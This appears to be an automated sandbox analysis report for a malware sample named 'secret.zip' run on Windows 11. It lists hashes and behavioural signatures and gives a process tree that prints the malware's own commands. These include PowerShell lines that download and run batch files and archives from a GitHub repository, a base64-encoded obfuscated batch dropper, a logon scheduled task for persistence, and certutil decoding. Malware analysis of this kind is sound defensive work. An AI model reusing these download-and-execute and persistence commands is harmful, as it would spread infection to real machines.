Analysis
-
max time kernel
324s -
max time network
330s -
platform
windows11-21h2_x64 -
resource
win11-20250502-en -
resource tags
arch:x64arch:x86image:win11-20250502-enlocale:en-usos:windows11-21h2-x64system -
submitted
15/05/2025, 08:29
Static task
static1
Behavioral task
behavioral1
Sample
secret.zip
Resource
win11-20250502-en
General
-
Target
secret.zip
-
Size
6.7MB
-
MD5
0304a313d8765b24f3a5106af2687dd1
-
SHA1
d6183b9f2d11a3a64829b035c8718ac07f77b98a
-
SHA256
f41e468b671f59a1cdaf868e4dc91106e341bdce5cad41d01c151d0e7ebcd9d1
-
SHA512
2619b81d8a19ec7bdd7feefdec119bd1c0d39c90fcb067b22c88f4b6f9a10af395e9718f075d080e9410cdf70e04a58124b99ca359639f9a1a34404ccc55535f
-
SSDEEP
196608:Mwp3XbOfBcS1masjD+u3ztYv6NhEEk5ab+rTzqnoM:MoIxmasndhpN6Gb6TdM
Malware Config
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 17 3260 powershell.exe 18 3260 powershell.exe 21 5696 powershell.exe 22 5696 powershell.exe 23 4844 powershell.exe 24 4844 powershell.exe 25 5592 powershell.exe -
pid Process 4396 powershell.exe 3628 powershell.exe 3432 powershell.exe 5492 powershell.exe 328 powershell.exe 5648 powershell.exe 3868 powershell.exe 5592 powershell.exe 3260 powershell.exe 5696 powershell.exe 4844 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regstartup32.bat cmd.exe -
Executes dropped EXE 3 IoCs
pid Process 2908 svchost.exe 2824 svchost.exe 3104 Rar.exe -
pid Process 5580 certutil.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
flow ioc 2 discord.com 4 discord.com 11 discord.com 18 raw.githubusercontent.com 24 raw.githubusercontent.com 3 discord.com 12 discord.com 14 raw.githubusercontent.com 22 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\balls.bat powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-330179853-1108322181-418488014-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ANCVirus.png" reg.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\SystemTemp msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3704 findstr.exe 4548 findstr.exe 1828 findstr.exe 1760 cmd.exe 5224 cmd.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133917717166453887" msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-330179853-1108322181-418488014-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-330179853-1108322181-418488014-1000\{48A23430-6D71-4A0F-9358-81C0CFDFB29D} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-330179853-1108322181-418488014-1000\{977BB5F3-E485-4AB6-927C-1A2E4E3A0765} msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4492 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 3260 powershell.exe 3260 powershell.exe 3628 powershell.exe 3628 powershell.exe 3432 powershell.exe 3432 powershell.exe 3432 powershell.exe 5696 powershell.exe 5696 powershell.exe 5696 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 5492 powershell.exe 5492 powershell.exe 5492 powershell.exe 328 powershell.exe 328 powershell.exe 328 powershell.exe 5648 powershell.exe 5648 powershell.exe 5648 powershell.exe 3868 powershell.exe 3868 powershell.exe 3868 powershell.exe 5592 powershell.exe 5592 powershell.exe 5592 powershell.exe 4396 powershell.exe 4396 powershell.exe 4396 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2436 msedge.exe 2436 msedge.exe 2436 msedge.exe 2436 msedge.exe 3124 msedge.exe 3124 msedge.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 3260 powershell.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeDebugPrivilege 3432 powershell.exe Token: SeDebugPrivilege 5696 powershell.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeDebugPrivilege 5492 powershell.exe Token: SeDebugPrivilege 328 powershell.exe Token: SeDebugPrivilege 5648 powershell.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeDebugPrivilege 5592 powershell.exe Token: SeDebugPrivilege 4396 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2436 msedge.exe 2436 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2720 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2564 wrote to memory of 4492 2564 rembotperm.exe 84 PID 2564 wrote to memory of 4492 2564 rembotperm.exe 84 PID 2564 wrote to memory of 2824 2564 rembotperm.exe 86 PID 2564 wrote to memory of 2824 2564 rembotperm.exe 86 PID 2564 wrote to memory of 2908 2564 rembotperm.exe 87 PID 2564 wrote to memory of 2908 2564 rembotperm.exe 87 PID 2908 wrote to memory of 1952 2908 svchost.exe 88 PID 2908 wrote to memory of 1952 2908 svchost.exe 88 PID 2824 wrote to memory of 5940 2824 svchost.exe 90 PID 2824 wrote to memory of 5940 2824 svchost.exe 90 PID 5940 wrote to memory of 3260 5940 cmd.exe 92 PID 5940 wrote to memory of 3260 5940 cmd.exe 92 PID 2908 wrote to memory of 1172 2908 svchost.exe 93 PID 2908 wrote to memory of 1172 2908 svchost.exe 93 PID 1172 wrote to memory of 3628 1172 cmd.exe 95 PID 1172 wrote to memory of 3628 1172 cmd.exe 95 PID 3628 wrote to memory of 5796 3628 powershell.exe 96 PID 3628 wrote to memory of 5796 3628 powershell.exe 96 PID 1172 wrote to memory of 852 1172 cmd.exe 98 PID 1172 wrote to memory of 852 1172 cmd.exe 98 PID 1172 wrote to memory of 2536 1172 cmd.exe 99 PID 1172 wrote to memory of 2536 1172 cmd.exe 99 PID 1172 wrote to memory of 2392 1172 cmd.exe 100 PID 1172 wrote to memory of 2392 1172 cmd.exe 100 PID 1172 wrote to memory of 2812 1172 cmd.exe 101 PID 1172 wrote to memory of 2812 1172 cmd.exe 101 PID 1172 wrote to memory of 1556 1172 cmd.exe 102 PID 1172 wrote to memory of 1556 1172 cmd.exe 102 PID 1172 wrote to memory of 3864 1172 cmd.exe 103 PID 1172 wrote to memory of 3864 1172 cmd.exe 103 PID 1172 wrote to memory of 1092 1172 cmd.exe 104 PID 1172 wrote to memory of 1092 1172 cmd.exe 104 PID 1172 wrote to memory of 2792 1172 cmd.exe 105 PID 1172 wrote to memory of 2792 1172 cmd.exe 105 PID 1172 wrote to memory of 4776 1172 cmd.exe 106 PID 1172 wrote to memory of 4776 1172 cmd.exe 106 PID 1172 wrote to memory of 2628 1172 cmd.exe 107 PID 1172 wrote to memory of 2628 1172 cmd.exe 107 PID 1172 wrote to memory of 3564 1172 cmd.exe 108 PID 1172 wrote to memory of 3564 1172 cmd.exe 108 PID 1172 wrote to memory of 2760 1172 cmd.exe 109 PID 1172 wrote to memory of 2760 1172 cmd.exe 109 PID 1172 wrote to memory of 2328 1172 cmd.exe 110 PID 1172 wrote to memory of 2328 1172 cmd.exe 110 PID 1172 wrote to memory of 1492 1172 cmd.exe 111 PID 1172 wrote to memory of 1492 1172 cmd.exe 111 PID 1172 wrote to memory of 720 1172 cmd.exe 112 PID 1172 wrote to memory of 720 1172 cmd.exe 112 PID 1172 wrote to memory of 1012 1172 cmd.exe 113 PID 1172 wrote to memory of 1012 1172 cmd.exe 113 PID 1172 wrote to memory of 2856 1172 cmd.exe 114 PID 1172 wrote to memory of 2856 1172 cmd.exe 114 PID 1172 wrote to memory of 2484 1172 cmd.exe 115 PID 1172 wrote to memory of 2484 1172 cmd.exe 115 PID 1172 wrote to memory of 2052 1172 cmd.exe 116 PID 1172 wrote to memory of 2052 1172 cmd.exe 116 PID 1172 wrote to memory of 1400 1172 cmd.exe 117 PID 1172 wrote to memory of 1400 1172 cmd.exe 117 PID 1172 wrote to memory of 644 1172 cmd.exe 118 PID 1172 wrote to memory of 644 1172 cmd.exe 118 PID 5796 wrote to memory of 4568 5796 cmd.exe 119 PID 5796 wrote to memory of 4568 5796 cmd.exe 119 PID 5796 wrote to memory of 3432 5796 cmd.exe 120 PID 5796 wrote to memory of 3432 5796 cmd.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4568 attrib.exe 4604 attrib.exe
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\secret.zip1⤵PID:3920
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2720
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\Temp1_secret.zip\rembotperm.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_secret.zip\rembotperm.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /RL HIGHEST /TN EmbeddedAppTask /TR C:\Users\Admin\AppData\Local\Temp\svchost.exe /F2⤵
- Scheduled Task/Job: Scheduled Task
PID:4492
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\cmd.execmd /C "powershell Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat\" -OutFile \"balls.bat\""3⤵
- Suspicious use of WriteProcessMemory
PID:5940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat\" -OutFile \"balls.bat\"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\cmd.execmd /C "Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat \" -OutFile \"balls.bat\""3⤵PID:1952
-
-
C:\Windows\system32\cmd.execmd /C balls.bat3⤵
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$Base64 = '//4mY2xzDQpAJXBVQmxJYzp+ODksODMlJVBVQkxpYzp+NSwxJUNIb14gb2ZeJVB1QmxJQzp+NDYsMTYlZg0KU0V0IFJePUpnXiVwVUJMSWM6fjEzLDElXmd0R1h6JXBVQkxJYzp+NCwxJXclcFVCTEljOn4xMSwxJV5obSVwVUJMSWM6fjEwLDElXlNeSEleT15BDQpeJXBVQmxJQzp+MTQsMSVeTCVwVUJsaUM6fjU1LDE3JV4lcHVibEljOn40LDElDQpAXmVeYyVyOn4xNSwxJV4lcjp+MTcsMSUgXiVyOn4xNywxJW4NCkBlYyVyOn4xMSwxJW8gb2ZmDQoNCiVyOn44LDElZSVyOn40LDElICJkJXI6fjIsMSVyPUM6XFUlcjp+OCwxJWVyJXI6fjgsMSVcJXVzZXJuYW1lJVxNJXI6fjIsMSVjcm8lcjp+OCwxJW9mJXI6fjQsMSUtRWQlcjp+MSwxJWUiDQoNCiVyOn4yLDElZiBubyVyOn40LDElIGV4JXI6fjIsMSUlcjp+OCwxJSVyOn40LDElICIlZGlyJSIgKA0KICAgICVyOn4xMiwxJWtkJXI6fjIsMSVyICIlZGlyJSINCiAgICBhJXI6fjQsMSUlcjp+NCwxJXIlcjp+MiwxJSVyOn4xMCwxJSArJXI6fjExLDElICIlZGlyJSINCiAgICBjb3B5ICIlfjAiICIlZGlyJVwlcjp+MTMsMSVwZGElcjp+NCwxJWVyLiVyOn4xMCwxJWElcjp+NCwxJSINCiAgICBwbyVyOn45LDElZXIlcjp+OCwxJSVyOn4xMSwxJWVsbCAtQ28lcjp+MTIsMSUlcjp+MTIsMSVhbmQgIiVyOn4xNCwxJSVyOn40LDElYXIlcjp+NCwxJS1Qcm9jZSVyOn44LDElJXI6fjgsMSUgJyIlZGlyJVwlcjp+MTMsMSVwZGElcjp+NCwxJWVyLiVyOn4xMCwxJWElcjp+NCwxJSInIC1XJXI6fjIsMSVuZG8lcjp+OSwxJSVyOn4xNCwxJSVyOn40LDEleWxlICVyOn4xNSwxJSVyOn4yLDElZGRlbiINCiAgICBkZWwgIiV+MCINCiAgICBleCVyOn4yLDElJXI6fjQsMSUNCikNCg0KcmQgLyVyOn44LDElIC9xICIldGVtcCVcNDMxNV80MDYyMTMxNDAiDQoNCnBvJXI6fjksMSVlciVyOn44LDElJXI6fjExLDElZWxsIC1DbyVyOn4xMiwxJSVyOn4xMiwxJWFuZCAiJiB7JXI6fjE2LDElbnZva2UtV2Ulcjp+MTAsMSVSZXElcjp+MTMsMSVlJXI6fjgsMSUlcjp+NCwxJSAtVXIlcjp+MiwxJSAnJXI6fjExLDElJXI6fjQsMSUlcjp+NCwxJXAlcjp+OCwxJTovLyVyOn4xLDElJXI6fjIsMSUlcjp+NCwxJSVyOn4xMSwxJSVyOn4xMywxJSVyOn4xMCwxJS5jbyVyOn4xMiwxJS9WJXI6fjIsMSUlcjp+OCwxJW8lcjp+NiwxJUMvTSVyOn4yLDElJXI6fjgsMSUlcjp+NCwxJWVyQm8lcjp+MTIsMSUlcjp+MTAsMSVhJXI6fjgsMSUlcjp+NCwxJSVyOn4yLDElYy9yYSVyOn45LDElLyVyOn4xMiwxJWElcjp+MiwxJW4vZG9uL1Jhci5leGUnIC0lcjp+MTcsMSUlcjp+MTMsMSUlcjp+NCwxJUYlcjp+MiwxJWxlICciJWRpciVcUmFyLmV4ZSInfSIgMj4mMSA+biVyOn4xMywxJWwNCnBvJXI6fjksMSVlciVyOn44LDElJXI6fjExLDElZWxsIC1DbyVyOn4xMiwxJSVyOn4xMiwxJWFuZCAiJXI6fjE2LDElbnZva2UtV2Ulcjp+MTAsMSVSZXElcjp+MTMsMSVlJXI6fjgsMSUlcjp+NCwxJSAtVXIlcjp+MiwxJSAnJXI6fjExLDElJXI6fjQsMSUlcjp+NCwxJXAlcjp+OCwxJTovLyVyOn4xLDElJXI6fjIsMSUlcjp+NCwxJSVyOn4xMSwxJSVyOn4xMywxJSVyOn4xMCwxJS5jbyVyOn4xMiwxJS9WJXI6fjIsMSUlcjp+OCwxJW8lcjp+NiwxJUMvTSVyOn4yLDElJXI6fjgsMSUlcjp+NCwxJWVyQm8lcjp+MTIsMSUlcjp+MTAsMSVhJXI6fjgsMSUlcjp+NCwxJSVyOn4yLDElYy9yYSVyOn45LDElL3JlZiVyOn44LDElLyVyOn4xMSwxJWVhZCVyOn44LDElLyVyOn4xMiwxJWElcjp+MiwxJW4vZG9uLyVyOn4xOCwxJU5DViVyOn4yLDElciVyOn4xMywxJSVyOn44LDElLnJhcicgLSVyOn4xNywxJSVyOn4xMywxJSVyOn40LDElRiVyOn4yLDElbGUgJyIlZGlyJVwlcjp+NCwxJSVyOn4xMiwxJXAucmFyIiciID5uJXI6fjEzLDElbA0KDQoiJWRpciVcUmFyIiB4IC1wJXI6fjE4LDElTkNvblQlcjp+MTcsMSVQICIlZGlyJVwlcjp+NCwxJSVyOn4xMiwxJXAucmFyIiAiJWRpciUiDQpjb3B5ICIlfjAiICIldGVtcCVcMTQyNjQ1NDc4MTM3MjIxNDgxODM1MTU3MjIyMTE5MzI4OTMiDQpjYWxsICIlZGlyJVwlcjp+MTIsMSVhJXI6fjIsMSVuLiVyOn4xMCwxJWElcjp+NCwxJSINCg0KciVyOn4xMiwxJWQlcjp+MiwxJXIgLyVyOn44LDElIC9xICIlZGlyJSINCmRlbCAiJX4wIg0KZXglcjp+MiwxJSVyOn40LDElDQpAZWMlcjp+MTEsMSVvIG9mZg0KJXI6fjgsMSVlJXI6fjQsMSUgYSA9ICUlfmkNCiVyOn44LDElZSVyOn40LDElIGEgPSAlICsgJX5pIiUlfiVyOn4yLDElIiUNCnNldCBhID0gJWElDQo6YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFiDQo='; $TempFile = [System.IO.Path]::Combine($env:TEMP, (Get-Random).ToString() + '.bat'); [System.IO.File]::WriteAllBytes($TempFile, [System.Convert]::FromBase64String($Base64)); Start-Process -WindowStyle Hidden -FilePath $TempFile"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1945869879.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:5796 -
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Microsoft-Edge"6⤵
- Views/modifies file attributes
PID:4568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process '"C:\Users\Admin\Microsoft-Edge\updater.bat"' -WindowStyle Hidden"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Microsoft-Edge\updater.bat" "7⤵PID:5088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& {Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/main/don/Rar.exe' -OutFile '"C:\Users\Admin\Microsoft-Edge\Rar.exe"'}"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/ANCVirus.rar' -OutFile '"C:\Users\Admin\Microsoft-Edge\tmp.rar"'"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Users\Admin\Microsoft-Edge\Rar.exe"C:\Users\Admin\Microsoft-Edge\Rar" x -pANConTOP "C:\Users\Admin\Microsoft-Edge\tmp.rar" "C:\Users\Admin\Microsoft-Edge"8⤵
- Executes dropped EXE
PID:3104
-
-
C:\Windows\system32\certutil.execertutil -decode "C:\Users\Admin\AppData\Local\Temp\15623_3106930297.tmp" "C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"8⤵
- Deobfuscate/Decode Files or Information
PID:5580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"' -WindowStyle Hidden"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd" "9⤵PID:2524
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"' -WindowStyle Hidden"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:328 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd" "11⤵
- Drops startup file
PID:1340 -
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\ANC"12⤵
- Views/modifies file attributes
PID:4604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Start-Process '"C:\Users\Admin\ANC\payload.bat"' -WindowStyle Hidden"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\ANC\payload.bat" "13⤵PID:1380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process '"C:\Users\Admin\ANC\payload.bat"' -WindowStyle Hidden"14⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3868 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\ANC\payload.bat" "15⤵PID:3468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://i.imgur.com/4A1D39J.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ANCVirus.png' -ErrorAction SilentlyContinue"16⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5592
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ANCVirus.png" /f16⤵
- Sets desktop wallpaper using registry
PID:4492
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "10" /f16⤵PID:3340
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f16⤵PID:3280
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters 1, True16⤵PID:1244
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\AssertSplit.jpeg"16⤵PID:3096
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\BlockExport.mp4"16⤵PID:3492
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ClearLimit.eprtx"16⤵PID:5016
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ConvertFromPing.potm"16⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3704
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\CopyEnter.sql"16⤵PID:4948
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ImportExit.temp"16⤵PID:2548
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\InitializeTest.crw"16⤵PID:1632
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\Microsoft Edge.lnk"16⤵PID:4416
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\PingShow.mpe"16⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4548
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ProtectLimit.jfif"16⤵PID:5004
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\PublishGroup.xlsb"16⤵PID:3388
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ReceiveWatch.clr"16⤵PID:2056
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\RepairWrite.midi"16⤵PID:2880
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResetInstall.dotx"16⤵PID:3584
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResizeClose.rm"16⤵PID:3136
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResizeUnlock.xps"16⤵PID:6076
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\RestorePush.au3"16⤵PID:5372
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SaveInitialize.au3"16⤵PID:4588
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SendUnlock.docx"16⤵PID:5724
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SkipFind.vdw"16⤵PID:4208
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SplitImport.docx"16⤵PID:5364
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\StepGrant.eps"16⤵PID:5824
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SubmitStep.MOD"16⤵PID:4596
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\TestBlock.zip"16⤵PID:4040
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnlockUninstall.wmx"16⤵PID:4648
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnpublishDismount.txt"16⤵PID:1700
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnregisterConfirm.vdw"16⤵PID:3192
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnregisterStop.jtx"16⤵PID:692
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UpdateReceive.ttc"16⤵PID:880
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UpdateRegister.ttf"16⤵PID:4872
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\WatchDismount.emf"16⤵PID:5764
-
-
C:\Windows\system32\findstr.exefindstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\AssertRequest.vsd"16⤵PID:5104
-
-
